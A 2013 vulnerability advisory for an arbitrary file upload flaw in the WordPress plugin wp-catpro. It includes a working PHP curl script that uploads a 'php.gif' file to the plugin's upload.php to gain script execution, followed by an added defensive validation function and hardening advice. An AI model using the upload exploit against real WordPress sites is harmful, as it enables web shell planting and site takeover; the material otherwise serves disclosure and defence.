WordPress plugin wp-catpro arbitrary file upload

Posted on 2013-2-27 20:12:43
WordPress plugin - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php

$uploadfile = "zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>

<?php
// Contents of zik.php.gif
phpinfo();
?>
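A defender's counterpart to the three weak settings quoted in the advisory (substring extension check, permissive filename regex, client-chosen upload folder), added here as an example; it is not code from the post or from the wp-catpro plugin, and the function name validate_image_upload and the two constants are assumptions.

```php
<?php
// Added hardening example (not the plugin's code). It validates an upload the
// way upload.php should have: one whitelisted extension, content checked by
// bytes rather than by name, and a server-generated filename.

const ALLOWED_EXT  = ['jpg', 'jpeg', 'gif', 'png'];
const ALLOWED_MIME = ['image/jpeg', 'image/gif', 'image/png'];

/**
 * Returns a fresh random filename with a whitelisted extension, or null when
 * the upload must be rejected. $tmpPath is the file PHP stored in the temp dir;
 * it is optional so the name check alone can be exercised.
 */
function validate_image_upload(string $clientName, ?string $tmpPath = null): ?string
{
    $base  = basename($clientName);            // drop any path component
    $parts = explode('.', $base);
    // Exactly one extension: "shell.php.gif" has two and is refused outright,
    // because an AddHandler-style mapping may execute it as PHP.
    if (count($parts) !== 2 || $parts[0] === '') {
        return null;
    }
    $ext = strtolower($parts[1]);
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    if ($tmpPath !== null) {
        // Check the bytes, not the name: a PHP script renamed to .gif fails here.
        $finfo = new finfo(FILEINFO_MIME_TYPE);
        $mime  = $finfo->file($tmpPath);
        if (!in_array($mime, ALLOWED_MIME, true) || getimagesize($tmpPath) === false) {
            return null;
        }
    }
    // Never reuse the client-supplied name; the plugin's regex admitted dots,
    // spaces and shell metacharacters.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed demo names; no real files are involved.
foreach (['shell.php.gif', 'photo.gif', '../x.PNG', '.gif', 'noext'] as $n) {
    $r = validate_image_upload($n);
    printf("%-14s => %s\n", $n, $r === null ? 'REJECTED' : 'ok (' . $r . ')');
}
```

The destination directory must also be fixed server-side rather than taken from the request's `folder` field, and the uploads directory should be served with script execution disabled so that a name-check bypass never yields code execution.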